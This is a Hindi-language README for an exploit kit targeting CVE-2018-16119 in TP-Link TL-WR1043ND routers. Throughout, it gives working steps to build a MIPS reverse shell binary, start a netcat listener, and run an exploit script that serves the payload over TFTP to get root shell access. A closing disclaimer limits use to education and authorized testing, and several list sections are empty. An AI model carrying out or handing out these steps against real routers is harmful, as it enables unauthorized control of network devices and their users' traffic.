
TP-Link TL-WR1043ND - प्रमाणित रिमोट कोड निष्पादन
CVE-2018-16119 एक गंभीर प्रमाणित रिमोट कोड निष्पादन भेद्यता है जो TP-Link TL-WR1043ND राउटरों को प्रभावित करती है। यह भेद्यता प्रमाणित हमलावरों को लक्षित डिवाइस पर रूट विशेषाधिकारों के साथ मनमाने कमांड निष्पादित करने की अनुमति देती है, जिससे संभावित रूप से सिस्टम से पूर्ण समझौता हो सकता है।
CVE विवरण: CVE-2018-16119
एक बार दोहन हो जाने पर, हमलावर को राउटर तक रूट शेल पहुंच प्राप्त हो जाती है, जिससे वे निम्न कार्य कर सकते हैं:
# आवश्यक पैकेज स्थापित करें
sudo apt-get update
sudo apt-get install netcat docker.io
इस दोहन के लिए MIPS बिग-एंडियन रिवर्स शेल बाइनरी की आवश्यकता होती है। इसे संकलित करने के लिए निम्न चरणों का पालन करें:
# सोर्स कोड को /tmp में कॉपी करें
cp exploit/tftp_server/reverse_shell_mipsbe.c /tmp/
# MIPS क्रॉस-कंपाइलेशन टूल्स वाले Docker कंटेनर का उपयोग करें
docker run -v /tmp/:/tmp/ -it asmimproved/qemu-mips /bin/bash
Docker कंटेनर के अंदर:
cd /tmp
mips-linux-gnu-gcc -static reverse_shell_mipsbe.c -o shh
Docker से बाहर निकलें और संकलित बाइनरी को कॉपी करें:
cp /tmp/shh exploit/tftp_server/
एक टर्मिनल खोलें और पोर्ट 9669 पर netcat लिसनर प्रारंभ करें:
Linux:
nc -l -p 9669 -vv
macOS:
nc -l 9669 -vv
रूट विशेषाधिकारों के साथ दोहन स्क्रिप्ट चलाएँ (TFTP सर्वर के लिए आवश्यक):
sudo python3 exploit/exploit.py
स्क्रिप्ट निम्न कार्य करेगी:
एक बार कनेक्शन स्थापित हो जाने पर:
CVE-2018-16119/
├── exploit/
│ ├── exploit.py # मुख्य दोहन स्क्रिप्ट
│ ├── requirements.txt # Python निर्भरताएँ
│ ├── notes.txt # अतिरिक्त नोट्स
│ └── tftp_server/
│ ├── reverse_shell_mipsbe.c # रिवर्स शेल सोर्स कोड
│ └── shh # संकलित MIPS बाइनरी
├── firmware/
│ └── wr740nv4_webrevert.bin # नमूना फर्मवेयर
├── squashfs-root/ # निकाला गया फर्मवेयर फाइलसिस्टम
└── README.md # यह फ़ाइल
इस भेद्यता को जिम्मेदारीपूर्वक प्रकट किया गया है और इसका उपयोग केवल निम्न के लिए किया जाना चाहिए:
⚠️ चेतावनी: यह दोहन केवल शैक्षिक और अधिकृत परीक्षण उद्देश्यों के लिए प्रदान किया गया है। कंप्यूटर सिस्टम तक अनधिकृत पहुंच अवैध और अनैतिक है। इस टूल का उपयोग करने से पहले उपयोगकर्ता यह सुनिश्चित करने के लिए जिम्मेदार हैं कि उनके पास उचित प्राधिकरण है।
Python आवश्यकताएँ स्थापित करें:
pip3 install -r exploit/requirements.txt
TFTP सर्वर अनुमति अस्वीकृत (Permission Denied):
कनेक्शन विफल (Connection Failed):
कोई शेल प्रतिक्रिया नहीं (No Shell Response):
id या pwd जैसे बुनियादी कमांड टाइप करने का प्रयास करेंयह अनुसंधान एम्बेडेड डिवाइस फर्मवेयर में गंभीर सुरक्षा कमजोरियों को प्रदर्शित करता है। यह भेद्यता निम्न के महत्व को उजागर करती है:
अनुसंधानकर्ता: Alejandro Parodi
ट्विटर: @hdbreaker
लिंक्डइन: Alejandro Parodi
यह अनुसंधान शैक्षिक उद्देश्यों और एम्बेडेड सिस्टम की सुरक्षा में सुधार के लिए आयोजित किया गया था। कृपया जिम्मेदारीपूर्वक उपयोग करें।